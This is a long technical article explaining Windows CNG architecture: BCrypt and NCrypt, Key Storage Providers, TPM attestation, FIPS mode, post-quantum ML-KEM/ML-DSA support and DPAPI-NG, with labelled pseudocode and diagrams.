The three design pillars Microsoft committed to in the CNG portal documentation were modularity, cryptographic agility, and FIPS-compliance readiness [@learn-microsoft-com-cng-features]. All three would matter twenty years later when post-quantum cryptography arrived without warning the protocol authors. We will get to that.

Throughout this article, "BCrypt" refers to Microsoft's CNG primitives header `bcrypt.h` and its companion DLL `bcryptprimitives.dll`. It is not the Provos-Mazieres password-hashing function of the same name, which is unrelated and uses a different spelling in most academic literature ("bcrypt"). The naming collision is unfortunate but firmly entrenched in Windows.

2. BCrypt: the symmetric stack and the ephemeral key

Open a Visual Studio project, include <bcrypt.h>, link bcrypt.lib, and you have access to almost every cryptographic primitive Windows ships. AES in CBC, CFB, ECB, GCM, and CCM modes. SHA-1, SHA-256, SHA-384, SHA-512, the SHA-3 family, and the cSHAKE128 and cSHAKE256 extendable-output functions added in Windows 11 24H2 [@learn-microsoft-com-algorithm-identifiers]. HMAC over any of those hashes. PBKDF2. The NIST SP 800-108 key-derivation construction. The DRBG-based random number generator drawn from NIST SP 800-90 [@csrc-nist-gov-1-final]. Ephemeral asymmetric operations -- RSA encrypt, ECDSA sign, ECDH key agreement -- on key handles that vanish when the process exits.

The canonical BCrypt opening dance is four calls.

{` // Pseudocode mirroring the BCryptOpenAlgorithmProvider flow. // In real C: NTSTATUS values, BCRYPT_ALG_HANDLE, etc.

const algId = "AES"; // wide string const impl = null; // null -> walk the priority list const flags = 0;

const hAlg = BCryptOpenAlgorithmProvider(algId, impl, flags); BCryptSetProperty(hAlg, "ChainingMode", "ChainingModeGCM");

const hKey = BCryptGenerateSymmetricKey(hAlg, keyBytes); const ciphertext = BCryptEncrypt(hKey, plaintext, authInfo);

BCryptDestroyKey(hKey); BCryptCloseAlgorithmProvider(hAlg, 0); `}

The interesting parameter is impl. When it is NULL, BCryptOpenAlgorithmProvider "attempts to open each registered provider, in order of priority, for the algorithm specified by the pszAlgId parameter and returns the handle of the first provider that is successfully opened" [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]. That sentence is the whole story of CNG provider priority in nineteen words.

Algorithm identifiers are wide strings. L"AES", L"SHA256", L"RSA", L"ML-KEM", L"ML-DSA", L"CHACHA20_POLY1305", L"CSHAKE128". Each string is registered in CNG's configuration store under HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\, with a per-algorithm ordered list of providers that claim to implement it. Add a new algorithm and you add a new string. Add a new provider and you append to its priority list. The API surface does not change.

Note: The algorithm-identifier string is the seam where cryptographic agility lives. As long as your protocol can encode "use whatever the spec calls AES-256-GCM," and as long as a CNG provider answers to that name, you can swap implementations without touching the calling code. Protocols whose wire format hard-codes the algorithm (the old SSL 3.0 cipher list, for example) do not get this benefit no matter what crypto API they call.

Underneath the API is a single implementation library. Microsoft's SymCrypt [@github-com-microsoft-symcrypt] has been the actual workhorse since Windows 10 version 1703: "SymCrypt is the core cryptographic function library currently used by Windows... Since the 1703 release of Windows 10, SymCrypt has been the primary crypto library for all algorithms in Windows." SymCrypt is open source. It carries hand-tuned assembly for AES-NI, VAES, SHA-NI, and PCLMULQDQ on x64, plus ARM64 SHA and AES intrinsics. On a modern Xeon, AES-GCM throughput from BCrypt routinely sits in the 4 to 8 GB/s range per core.

SymCrypt's open-source release in 2019 was a quiet event for a Microsoft library: the algorithms that protect Windows are reviewable by anyone willing to read C and ARM/x64 assembly.

BCrypt keys are ephemeral by construction. A BCRYPT_KEY_HANDLE lives in your process and dies with it. If you want to keep a private key around between processes, between reboots, or between machines, you do not use BCrypt. You use NCrypt.

That distinction is the first thing developers get wrong when they meet CNG. The second thing they get wrong is forgetting that BCrypt's GCM API does not allocate nonces for you. The NIST SP 800-38D specification of Galois/Counter Mode [@nvlpubs-nist-gov-nistspecialpublication800-38dpdf] is famously brittle under nonce reuse: a single repeated nonce under the same key destroys both confidentiality (XOR of plaintexts leaks) and authenticity (the GHASH authentication key becomes recoverable). With 96-bit random nonces the birthday bound limits safe usage to roughly $2^{32}$ invocations per key before collision probability becomes meaningful. Counter-based nonces sidestep the birthday bound entirely but require persistent state. CNG does neither for you. That part is your problem.

Note: First, GCM nonce reuse: BCryptEncrypt with BCRYPT_CHAIN_MODE_GCM accepts whatever 12 bytes you hand it. Counter or random, but never twice. Second, algorithm string drift: BCRYPT_SHA256_ALGORITHM is the macro for L"SHA256". L"SHA-256" returns STATUS_NOT_FOUND. Third, kernel-mode pseudo-handles: the convenient BCRYPT_AES_ALG_HANDLE shortcut is user-mode only per the BCryptOpenAlgorithmProvider remarks [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]; kernel drivers must use real handles.

Windows 10 added pseudo-handles -- pre-baked handle constants like BCRYPT_AES_ALG_HANDLE and BCRYPT_SHA256_ALG_HANDLE -- that skip the provider lookup for the built-in algorithms. The 24H2 release extended that list to include BCRYPT_MLKEM_ALG_HANDLE and the cSHAKE handles. Microsoft now recommends pseudo-handles over BCryptOpenAlgorithmProvider for new code [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider] when the algorithm is built in. The motivation is performance: pseudo-handles bypass the per-call provider walk and the configuration-store lookup.

That covers the primitives. Now we need a place to keep the keys.

3. NCrypt: where the long-lived secrets live

The ncrypt.h header opens a different door. Every function in the NCrypt API surface [@learn-microsoft-com-api-ncrypt] -- NCryptOpenStorageProvider, NCryptCreatePersistedKey, NCryptOpenKey, NCryptSignHash, NCryptDecrypt, NCryptKeyDerivation, NCryptExportKey, NCryptProtectSecret -- begins by routing the call through ncrypt.dll, which acts as a router rather than an implementation. The router decides which Key Storage Provider handles the operation and forwards the call.

That routing layer is the architectural distinction Microsoft has insisted on for two decades. Microsoft's Key Storage and Retrieval documentation [@learn-microsoft-com-and-retrieval] describes it like this: the NCrypt router "conceals details, such as key isolation, from both the application and the storage provider itself." Translation: the application calls NCryptSignHash and gets back a signature. It does not know -- and should not need to know -- whether the key lives in %APPDATA%, inside a TPM chip on the motherboard, on a smart card halfway across the room, or in a network-attached hardware security module in a data center on a different continent.

A registered plug-in DLL that owns persistent private-key material and exposes it through the NCrypt API. Microsoft ships four built-in KSPs (Software, Platform/TPM, Smart Card, and the CNG-DPAPI provider); third parties ship KSPs for HSM appliances, USB security keys, and cloud key services. Selecting a KSP is a matter of passing the right name string to `NCryptOpenStorageProvider`.

The mechanical flow for creating a persisted key looks like this.

sequenceDiagram participant App as Application participant Router as ncrypt.dll (NCrypt router) participant KSP as Microsoft Software KSP participant LSA as LSA key-isolation process participant Disk as %APPDATA%\Microsoft\Crypto\Keys\

App->>Router: NCryptOpenStorageProvider("Microsoft Software Key Storage Provider")
Router-->>App: hProvider
App->>Router: NCryptCreatePersistedKey(hProvider, "RSA", "MyKey", 2048, ...)
Router->>KSP: dispatch via registered KSP entry points
KSP->>LSA: LRPC: generate key, return handle
LSA->>Disk: write DPAPI-wrapped private blob
LSA-->>KSP: ok
KSP-->>Router: hKey
Router-->>App: hKey
App->>Router: NCryptSignHash(hKey, digest)
Router->>KSP: forward
KSP->>LSA: LRPC: sign with isolated key
LSA-->>KSP: signature
KSP-->>Router: signature
Router-->>App: signature

Two facts about that diagram matter. First, the private key bits never enter the calling process. They are generated inside the LSA process and the calling application only ever receives a handle and the eventual signature. Second, the LRPC hop is real: it costs roughly 30 to 100 microseconds per call on modern hardware. For bulk symmetric encryption you would not want this overhead, which is why CNG's design pushes you toward BCrypt for symmetric work and reserves NCrypt for the rarer, smaller, and more sensitive operations on long-lived asymmetric keys.The LSA key-isolation process is lsaiso.exe on systems with Credential Guard enabled, hosted inside the Virtualization-Based Security (VBS) trustlet boundary. On systems without VBS, the role is played by lsass.exe itself. Either way, key material does not enter the application's address space.

NCrypt is also where the asymmetric algorithms live in their persistent form. The Microsoft Software Key Storage Provider claims RSA keys from 512 to 16384 bits in 64-bit increments, DSA, DH, and ECDSA/ECDH on the NIST P-256, P-384, and P-521 curves [@learn-microsoft-com-and-retrieval]. Windows 11 24H2 added ML-KEM at the 512, 768, and 1024 parameter sets and ML-DSA at the 44, 65, and 87 parameter sets to the Software KSP's repertoire.

The split between BCrypt and NCrypt is sometimes confusing because there is overlap. You can sign with BCrypt's BCryptSignHash if you generated an ephemeral key pair. You can also sign with NCrypt's NCryptSignHash if the key is persisted in a KSP. The rule of thumb is: if the key needs to survive the process, use NCrypt; if it does not, use BCrypt. Real-world Windows code skews heavily toward NCrypt for asymmetric operations because almost every interesting asymmetric key has an associated certificate, and certificates outlive processes.

Note: The four Microsoft KSP name strings are MS_KEY_STORAGE_PROVIDER (Software), MS_PLATFORM_KEY_STORAGE_PROVIDER (TPM/Pluton), MS_SMART_CARD_KEY_STORAGE_PROVIDER, and MS_NGC_KEY_STORAGE_PROVIDER (Next Generation Credentials, used by Windows Hello). Typo any of these and you silently fall through to the Software KSP, which is a recurring source of "why is my key on disk instead of in the TPM" incident reports.

The router lets the application speak one language and have the storage backend vary. That makes the KSP plug-in model the most interesting piece of the architecture, and it deserves its own section.

4. The KSP model: one API, many places to keep keys

A KSP is a DLL on disk and an entry in the registry. The DLL exports a fixed set of function pointers that mirror NCrypt's API. The registry entry under HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Microsoft Software Key Storage Provider (and its siblings) tells ncrypt.dll which DLL to load when an application asks for a provider by name. That is the whole interface contract. If you can produce a DLL that implements the entry points and you can install a registry entry, you have a CNG KSP.

The platform comes with four. They sit on a spectrum from "your operating system is the entire trust boundary" to "the keys live on a separate piece of silicon and only signatures come back."

flowchart LR A["Microsoft Software KSP -- private keys on disk -- (DPAPI-wrapped)"] --> B["Microsoft Platform Crypto Provider -- TPM 2.0 or Pluton -- on-CPU silicon"] B --> C["Microsoft Smart Card KSP -- removable hardware token -- (PIV, CAC, Yubikey)"] C --> D["Third-party HSM KSP -- Thales Luna, Entrust nShield, -- YubiHSM 2, AWS CloudHSM"] A -.-> A1["~10^4 RSA-2048 sign/sec -- FIPS 140-2 L1"] B -.-> B1["~1-10 sign/sec -- TPM vendor cert"] C -.-> C1["~1-5 sign/sec -- card vendor cert"] D -.-> D1["~10^2-10^4 sign/sec -- FIPS 140-2/-3 L3 typical"]

4.1 The Microsoft Software KSP

The default. If you pass NULL for the provider name in NCryptOpenStorageProvider, you get this one. It stores per-user private keys at %APPDATA%\Microsoft\Crypto\Keys\ and per-machine keys at %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\SystemKeys\, with each file-level blob further protected by DPAPI under either the user master key or the LocalSystem (S-1-5-18) master key. The private-key operations dispatch through LRPC into the LSA key-isolation process so that even with administrator privileges on the machine, naive code-injection into the application's address space does not yield key bits.

The Microsoft Software KSP is also the only KSP that runs inside the LSA key-isolation process. Third-party KSPs run in the calling application's process. That difference matters enormously for the threat model. Microsoft notes this explicitly: third-party KSPs "do not run inside the LSA process" [@learn-microsoft-com-and-retrieval]. If you are a third-party KSP that talks to remote HSM hardware, the isolation comes from the HSM itself, not from any Windows process boundary.

4.2 The Microsoft Platform Crypto Provider (TPM and Pluton)

The KSP that answers to MS_PLATFORM_KEY_STORAGE_PROVIDER is the TPM's face to CNG. When you call NCryptCreatePersistedKey against it, the TPM 2.0 chip itself [@learn-microsoft-com-tpm-fundamentals] generates the key under the protection of its Storage Root Key. The private bits never leave the chip. The application gets back a handle whose only operations are sign, decrypt, and key derivation -- the private key cannot be exported, and that property is enforced by physics, not by software policy.

Key idea: The Platform Crypto Provider is the place where CNG stops trusting the operating system and starts trusting a separate piece of silicon. Every TPM-backed key in Windows -- BitLocker's Volume Master Key wrapping, Windows Hello credentials, AD CS attestation-enrolled machine identities -- enters and exits through this single KSP name.

Microsoft Pluton, the security processor that shipped in 2022 on AMD Ryzen 6000, Snapdragon 8cx Gen 3, and Intel Core Ultra Series 2 silicon, is exposed to Windows as a TPM 2.0 device behind the same Platform Crypto Provider name [@learn-microsoft-com-security-processor]. Application code that worked against a discrete TPM works against Pluton with no changes. Pluton's wins are at the supply-chain layer (no SPI bus to physically tap between the chip and the CPU) and the firmware-update layer (Pluton firmware ships via Windows Update). The Windows-facing API is intentionally identical.

4.3 The Microsoft Smart Card KSP

MS_SMART_CARD_KEY_STORAGE_PROVIDER is a single KSP that routes to whichever vendor minidriver claims the inserted card. The minidriver model is Microsoft's plug-in layer below the KSP layer: smart-card vendors do not write CNG KSPs, they write minidrivers, and Microsoft's single KSP fans the calls out to them via the APDU protocol. Cards that follow Microsoft's Generic Identity Device Specification (GIDS) [@learn-microsoft-com-device-specification] work without a vendor minidriver. Cards that do not, including most US federal PIV cards before about 2015, ship vendor-specific minidrivers.

This is the layer that powers Windows Hello for Business "virtual smart card" credentials, which present a TPM-backed key through the smart-card path because so much enterprise software already knew how to talk to PIV-style cards.

4.4 Third-party HSM and security-key KSPs

YubiHSM 2, Thales Luna, Entrust nShield, AWS CloudHSM Client for Windows, and various cloud-KMS bridges all ship CNG KSPs. The KSP DLL pretends to be a local provider and proxies operations across whatever transport the device uses -- USB for a YubiHSM, PCIe or TCP for a Luna, HTTPS for a cloud HSM. Latency varies from microseconds for a USB device to a few milliseconds for a network HSM. The application code that calls NCryptSignHash does not change.

For an internal Active Directory Certificate Services CA, the KSP choice is the entire trust story. A CA whose root key lives in the Software KSP can have that key extracted by any administrator. A CA whose root lives in a FIPS 140-2 Level 3 HSM KSP requires physical access to the HSM (often with multi-person key ceremonies) to recover the key. The application code in `certutil` is identical in both cases. The audit story is not.

5. The TPM KSP, attestation, and the hardware boundary

A TPM-bound key is a useful key, but a TPM-bound key with an attestation statement is a different kind of asset entirely. The Trusted Platform Module supports a primitive called key attestation: the TPM can sign a statement that says, "this key was generated inside me, I will never let it out, and here is a chain of trust back to my Endorsement Key that proves I am a real TPM made by a real vendor." A certificate authority that requires this attestation can refuse to issue a certificate for any key that did not come from inside a TPM.

Active Directory Certificate Services supports exactly this flow as "TPM key attestation" [@learn-microsoft-com-key-attestation]. The flow involves three keys: an Endorsement Key (EK) burned into the TPM at manufacture, an Attestation Identity Key (AIK) derived from the EK and certified by Microsoft or by the enterprise PKI, and the application key being attested. The AIK signs a statement covering the application key's properties; the CA verifies the AIK certificate chain and the statement, and only then issues a certificate.

flowchart TD EK["Endorsement Key (EK) -- burned into TPM at manufacture -- vendor cert from Intel/AMD/etc."] AIK["Attestation Identity Key (AIK) -- generated in TPM, certified by -- Microsoft EK CA or enterprise PKI"] APPK["Application key -- generated in TPM via -- NCryptCreatePersistedKey"] STMT["Attestation statement -- signed by AIK"] CA["Enterprise CA (AD CS) -- verifies AIK chain -- and attestation"] CERT["X.509 certificate -- issued to application key"]

EK --> AIK
AIK --> STMT
APPK --> STMT
STMT --> CA
CA --> CERT

The CNG-facing API for this is the property bag on a NCRYPT_KEY_HANDLE. After creating the key, the application calls NCryptGetProperty with NCRYPT_KEY_ATTESTATION_PROPERTY (and friends) to retrieve the attestation blob. The CA receives the blob in the certificate request and validates it against Microsoft's published EK CA roots. The whole protocol fits inside the standard certificate-enrollment flow.

Key idea: A software KSP can promise that a key is non-exportable. A TPM KSP can prove it.

Throughput is the price. A typical TPM 2.0 chip performs single-digit RSA-2048 signatures per second. Pluton-based platforms are in the same neighborhood. Any architecture that wants to do a TPM signature on every HTTP request will fall over almost immediately. The TPM is the right home for one signature per session, per boot, or per logon -- not one per packet.Key migration between TPMs is essentially impossible by design. Replace a motherboard, and any keys that were sealed to the old TPM's Storage Root Key are gone. This is the same property that makes BitLocker safe against motherboard theft (the recovery key, escrowed elsewhere, is the only way back) and the same property that makes TPM-bound device identities a key-management headache during hardware refresh cycles.

There is a deeper, more philosophical reason to use the TPM that the API does not advertise. Software keys are bounded by the kernel's process-isolation guarantees. Any kernel-level attacker, any user with SeDebugPrivilege, or any code injected into lsass.exe can in principle reach key material. The provably stronger bound -- keys that no OS-level code can ever read -- requires an off-CPU hardware boundary. CNG's own design notes acknowledge this when they say CNG "is designed to be usable as a component in a FIPS level 2 validated system" [@learn-microsoft-com-cng-features]: software-only isolation maps to FIPS 140-2 Levels 1 and 2; hardware boundaries are required for Level 3 and above.

6. FIPS 140 mode, compliance, and the one-bit toggle

There is a registry value at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled. When it is set to 1 (or when the equivalent Group Policy "System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing" is enabled), Schannel and CNG callers refuse to use algorithms that fall outside the FIPS-approved set. RC4 disappears. MD5 disappears. SHA-1 disappears for new signatures (though not for legacy verification). TLS suites that rely on any of those are removed from the negotiation list.

The toggle is a runtime gate, not a code path. The underlying modules -- bcryptprimitives.dll and cng.sys [@learn-microsoft-com-140-windows11] -- are the same modules either way. They have been submitted to the Cryptographic Module Validation Program [@csrc-nist-gov-modules-search] and validated against the FIPS 140-2 standard [@csrc-nist-gov-2-final]. The toggle simply tells those modules that the calling environment expects FIPS-mode behavior, and the modules then refuse the non-approved algorithms.

A US federal certification program (Federal Information Processing Standard 140) that subjects a cryptographic module to laboratory testing and NIST review. Validated modules receive a public CMVP certificate. Federal agencies, FedRAMP/CMMC contractors, and most regulated industries can only use validated modules in approved configurations. FIPS 140-2 and the newer FIPS 140-3 differ mainly in test methodology and the standard's own ISO/IEC alignment.

Two current Windows 11 certificate numbers are worth memorizing. CMVP certificate #4825 covers bcryptprimitives.dll [@csrc-nist-gov-certificate-4825]. CMVP certificate #4766 covers cng.sys [@csrc-nist-gov-certificate-4766], the kernel-mode primitives. Both are FIPS 140-2 Level 1 modules with a sunset date of September 21, 2026 under the CMVP's transition rules. Microsoft maintains the per-version FIPS validation portal for Windows 11 [@learn-microsoft-com-140-windows11], which lists the active certificates per build and the algorithms each one covers.

The cadence mismatch is the open story here. Windows ships H1 and H2 feature updates roughly every six months. CMVP validation of a new build's primitives DLL and kernel module typically takes 12 to 24 months. Federal customers, FedRAMP-bound cloud tenants, and CMMC contractors cannot run a Windows build that does not have an active FIPS certificate covering its cryptographic modules. Microsoft submits 140-3 evidence for newer modules, but as of mid-2026 no public 140-3 certificate is visible on CMVP for the bcryptprimitives.dll shipping in Windows 11 24H2.

Note: Setting FIPSAlgorithmPolicy\Enabled = 1 is necessary for FIPS compliance, but not sufficient. The validated configuration also requires that Windows be a covered build (with an active certificate), that you avoid third-party crypto libraries that have not been validated, and that algorithm choices stay inside the per-certificate Approved Mode list. A Windows version without an active certificate is not in compliance even with the toggle on.

The toggle also does not change the SymCrypt implementations. AES-GCM is still AES-GCM. What changes is which APIs the caller is allowed to reach. From the application's point of view, the symptom of FIPS mode is STATUS_NOT_SUPPORTED on BCryptOpenAlgorithmProvider(L"RC4", ...). From an auditor's point of view, the symptom is the absence of any disallowed primitive call in the binary.

7. The post-quantum slide: ML-KEM, ML-DSA, and the agility test

The piece of CNG that earns its "agility" billing is the post-quantum transition.

NIST opened the Post-Quantum Cryptography standardization process in 2016 and ran four rounds of public evaluation [@csrc-nist-gov-quantum-cryptography] before issuing the first final standards in August 2024. FIPS 203 standardizes ML-KEM (formerly CRYSTALS-Kyber), a module-lattice key encapsulation mechanism [@nvlpubs-nist-gov-fips-nistfips203pdf]. FIPS 204 standardizes ML-DSA (formerly CRYSTALS-Dilithium), a module-lattice digital signature algorithm [@csrc-nist-gov-204-final]. Microsoft Research had been working on lattice cryptography for years [@microsoft-com-quantum-cryptography], and the public CNG implementations followed quickly: Windows 11 24H2 ships ML-KEM and ML-DSA as first-class CNG algorithms.

Here is the surprising part: the CNG API surface did not change. Adding ML-KEM was a matter of registering new algorithm identifier strings -- BCRYPT_MLKEM_ALGORITHM, the parameter sets BCRYPT_MLKEM_PARAMETER_SET_512, BCRYPT_MLKEM_PARAMETER_SET_768, BCRYPT_MLKEM_PARAMETER_SET_1024 -- in the CNG algorithm-identifier registry [@learn-microsoft-com-algorithm-identifiers]. The opening dance for an ML-KEM key encapsulation looks exactly like the opening dance for an ECDH key agreement, except for the string.

{` // Mirrors the BCrypt pattern shown in the Microsoft sample // "Using ML-KEM with CNG for Key Exchange"

const hAlg = BCryptOpenAlgorithmProvider("ML-KEM", null, 0);

const hKeyPair = BCryptGenerateKeyPair(hAlg, 0, 0); BCryptSetProperty(hKeyPair, "ParameterSetName", "ML-KEM-768"); BCryptFinalizeKeyPair(hKeyPair, 0);

const pubBlob = BCryptExportKey(hKeyPair, "MLKEMPUBLICBLOB");

// Sender side: encapsulate to recipient's public key const recipPub = BCryptImportKeyPair(hAlg, "MLKEMPUBLICBLOB", pubBlob); const { ciphertext, sharedSecret: ssA } = BCryptEncapsulate(recipPub);

// Recipient side: decapsulate with the matching private key const ssB = BCryptDecapsulate(hKeyPair, ciphertext);

// ssA === ssB `}

That code is structurally identical to a 2007-era ECDH session. The string changes, the blob format changes, and the wire-format sizes change considerably. ML-KEM ciphertexts at the 512, 768, and 1024 parameter sets are 768, 1088, and 1568 bytes respectively, with public keys of 800, 1184, and 1568 bytes per FIPS 203 [@csrc-nist-gov-203-final]. ML-DSA signatures at parameter sets 44, 65, and 87 are 2420, 3309, and 4627 bytes per FIPS 204 [@csrc-nist-gov-204-final]. For comparison, an ECDSA P-256 signature is 64 bytes and an X25519 public key is 32 bytes. The PQC blowup is roughly an order of magnitude, and that has knock-on consequences for every protocol that carries certificates or handshakes on the wire.

The reason ML-KEM matters before any large quantum computer exists is the harvest-now, decrypt-later attack: an adversary recording today's TLS sessions can decrypt them years from now if the long-lived key-exchange material was only protected by RSA or ECDH. Long-lived secrets transmitted over the wire today -- medical records, source code, government cables -- have a confidentiality lifetime measured in decades. The motivation for hybrid PQ key exchange is that you cannot un-record traffic.

The wire-format problem is why most TLS-PQ deployments use hybrid groups: classical X25519 combined with ML-KEM-768, with the shared secret derived from both. If either component breaks, the other one still holds. The IETF draft draft-kwiatkowski-tls-ecdhe-mlkem [@learn-microsoft-com-mlkem-examples] defines the X25519MLKEM768 group with IANA codepoint 0x11EC, and Chrome, Cloudflare, and AWS shipped support in production in 2024. OpenJDK JEP 527 [@openjdk-org-jeps-527] tracks the equivalent work for Java's TLS stack. Schannel in Windows 11 24H2 can negotiate ML-KEM through CNG, but Microsoft has not publicly committed to a default-on hybrid group at the Schannel layer as of mid-2026.

On a Windows 11 24H2 machine, the following PowerShell snippet asks CNG for its registered algorithms:

[System.Security.Cryptography.CngAlgorithm]::new("ML-KEM")
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\Default\0010'

The first line forces a CngAlgorithm lookup. The second walks the configuration store. If the keys ML-KEM and ML-DSA appear, your kernel-mode and user-mode primitives are 24H2-current.

The bigger structural lesson is that two decades of "cryptographic agility" claims actually paid off. The PQC transition required a 24H2 update, not a CNG redesign.

8. Where CNG actually shows up: TLS, BitLocker, and friends

The argument for an OS-level cryptographic API stands or falls on what runs on top of it. Every modern Windows component that touches cryptography is a CNG consumer.

The Windows implementation of TLS and DTLS, exposed through the SSPI (Security Support Provider Interface). Schannel handles the TLS protocol state machine, certificate validation, and cipher-suite negotiation, then delegates the actual cryptography to BCrypt and NCrypt. The cipher-suite priority list and protocol-version controls are configured per Windows version, often via Group Policy.

Schannel, the Windows TLS stack, sits directly above CNG. The Schannel cipher-suite list is its own per-version object, documented at the Schannel cipher-suites portal [@learn-microsoft-com-in-schannel]. For TLS 1.2 and earlier, the order is administered via the registry key HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\SSL\00010002 (the "Functions" value) or the Group Policy "SSL Cipher Suite Order." For TLS 1.3, the three suites (TLS_AES_256_GCM_SHA384, TLS_AES_128_GCM_SHA256, TLS_CHACHA20_POLY1305_SHA256) are not user-orderable; Schannel hard-codes the priority. TLS 1.0 and TLS 1.1 are off by default in Windows 11 23H2 and later, per Microsoft's August 2023 deprecation announcement [@techcommunity-microsoft-com-windows-3887947].

flowchart TD App["Application -- (WinHTTP, HttpClient, browser, ...)"] SSPI["SSPI / CredSSP layer"] Schannel["Schannel -- protocol state machine -- cipher-suite negotiation"] BCrypt["BCrypt -- AES-GCM, SHA-2/3, HKDF, RNG"] NCrypt["NCrypt -- server cert private key sign -- client cert auth"] KSP["KSP (Software / TPM / -- Smart Card / HSM)"]

App --> SSPI
SSPI --> Schannel
Schannel --> BCrypt
Schannel --> NCrypt
NCrypt --> KSP

BitLocker is the canonical NCrypt-and-TPM consumer. The Full Volume Encryption Key (FVEK) is generated and stored encrypted on disk. The Volume Master Key (VMK) wraps the FVEK and is itself wrapped by one or more "protectors": the TPM, a recovery password, a startup PIN, a USB startup key. The TPM protector is an NCrypt-style operation against the Platform Crypto Provider, sealed to a set of Platform Configuration Register (PCR) measurements that capture the boot state. If anything in the early boot chain changes, the PCRs do not match, the TPM refuses to unwrap the VMK, and BitLocker falls back to recovery.

Authenticode, the signature format on Windows binaries, is a NCrypt-driven workflow at signing time and a BCrypt-driven workflow at verification time. The Windows kernel verifies driver signatures, the Windows loader verifies binary signatures, and WinVerifyTrust exposes the same machinery to applications. The hash algorithm in modern Authenticode is SHA-256, which means every signed executable on the system has a SHA-256 digest computed by BCrypt at some point during validation.

Credential Guard runs the LSA isolated process (lsaiso.exe) inside the Virtualization-Based Security trustlet boundary on systems with VBS enabled. Credential Guard does not replace CNG; it relocates the Microsoft Software KSP into a stronger isolation boundary. NTLM password hashes and Kerberos TGT session keys live inside that boundary, accessible only through the standard CNG calls dispatched into the trustlet.

Windows Hello for Business uses the Platform Crypto Provider as the home for the user's gesture-protected authentication key. The biometric (or PIN) unlocks a key in the TPM; that key signs an attestation that is consumed by Azure AD or AD FS. The biometric never leaves the device.

DPAPI and DPAPI-NG are themselves built on CNG, and they deserve their own section because they are the easiest place to see how the layering pays off.

Schannel, BitLocker, EFS, Authenticode, Credential Guard, Windows Hello, DPAPI-NG, IPsec, SMB encryption, Kerberos PKINIT -- every modern Windows component is a CNG consumer.

9. DPAPI-NG: a worked example of the NCrypt model

The original Data Protection API (DPAPI), shipped with Windows 2000, was a per-user secret-protection mechanism. An application called CryptProtectData, passed a blob of secret data, and got back an encrypted blob that only the same user on the same machine could later unwrap. The mechanism was anchored in the user's logon credentials, with a master key per user and a complex backup mechanism for password resets. It worked. It also locked the secret to a single machine, which became a problem the moment users started living on more than one device.

DPAPI-NG, introduced in Windows 8 and Windows Server 2012, is the cloud-era rebuild. The CNG DPAPI documentation [@learn-microsoft-com-cng-dpapi] describes the three calls: NCryptCreateProtectionDescriptor, NCryptProtectSecret, and NCryptUnprotectSecret. The protection descriptor is a small string that names who can unwrap the data. Examples include SID=S-1-5-21-... for an Active Directory user or group, LOCAL=user for the legacy single-user behavior, WEBCREDENTIALS=... for a credential vault entry, and combinations connected by AND or OR operators.

flowchart LR Plain["plaintext secret"] --> Protect["NCryptProtectSecret(descriptor, plain)"] Desc["descriptor: -- SID=group GUID -- OR -- LOCAL=user"] --> Protect Protect --> Blob["opaque blob"] Blob --> Unprotect["NCryptUnprotectSecret(blob)"] Unprotect -.->|"resolves descriptor -- via AD DC backup keys"| AD["Active Directory DC -- (DPAPI backup keys)"] Unprotect --> Out["plaintext secret -- on any authorized machine"]

The architectural win is that DPAPI-NG is just NCrypt with a particular protection-descriptor schema. Any KSP that can serve the key referenced by the descriptor can satisfy the unwrap. In an Active-Directory-joined environment, the AD domain controller's DPAPI backup keys allow any machine where the user (or any member of the named group) authenticates to recover the secret. The application that called NCryptProtectSecret does not need to know about backup keys, replication topology, or recovery flows. It calls NCrypt; the router and the relevant KSP do the rest.

This is the design payoff of the two-tier model. A new key-management capability (cross-machine recovery via AD-stored backup keys) becomes a new descriptor type, not a new API. The Windows team has used the same descriptor extensibility to add web-credential descriptors, container-bound descriptors, and the descriptors that protect Group Managed Service Account passwords. Each one is a private key-management concern; none of them broke the public API.The DPAPI-NG descriptor language is small enough to read in one sitting and powerful enough to express "any member of this AD group, on any machine where that member can authenticate." That is the cloud-era access-control story that the original DPAPI never had.

10. Engineering takeaways: choosing the right tool

The decision tree for CNG usage in production code is short.

flowchart TD Q1{"Need persistent -- private key?"} Q1 -- No --> B["BCrypt -- (ephemeral key, pseudo-handle)"] Q1 -- Yes --> Q2{"Threat model?"} Q2 -- "Machine identity, -- hardware-rooted" --> P["Microsoft Platform -- Crypto Provider -- (TPM / Pluton)"] Q2 -- "User-bound PKI, -- removable hardware" --> S["Microsoft Smart Card KSP -- (PIV / virtual smart card)"] Q2 -- "High signing rate, -- regulated custody" --> H["Third-party HSM KSP -- (YubiHSM / Luna / nShield)"] Q2 -- "Default, -- portable, fast" --> SW["Microsoft Software KSP"]

For algorithm choice in mid-2026, the defensible defaults look like this. Symmetric encryption: ChaCha20-Poly1305 or AES-256-GCM. Hashing: SHA-256 or SHA-3 family. Signatures: ECDSA P-256 or P-384 today, with ML-DSA-65 in the back pocket for the inevitable hybrid transition. Key encapsulation: X25519 today, with X25519+ML-KEM-768 hybrid as soon as your peers support it. RSA-2048 only for legacy interoperability. RC4, 3DES, and SHA-1 only behind explicit deprecation policy, and only for verification of historical artifacts.

Key idea: The hardest thing about CNG is not learning the API. It is choosing the right KSP. That single decision -- where the private key actually lives -- determines almost everything about your threat model, your throughput, your compliance posture, and your operational complexity.

A few engineering rules survive in any setting.

Do not put persistent keys in BCrypt. Every BCrypt key handle dies with the process. The architectural separation exists for a reason. If the key needs to survive a reboot, it belongs in NCrypt under a named KSP.

Do not assume the Software KSP. Code that calls NCryptOpenStorageProvider(NULL) ends up with whatever the default is. On a server with an HSM KSP configured as the default, this might be what you want; on a developer workstation, it might be the Microsoft Software KSP. Be explicit. Pass the name string. Test the negative case where the KSP you named is not registered.

Audit which KSP your certificates actually use. A certificate enrolled with the Platform Crypto Provider behaves identically to a certificate enrolled with the Software KSP from certutil's point of view. The difference is invisible until you ask. Use certutil -store -v My to dump certificate properties, and look for the provider field.

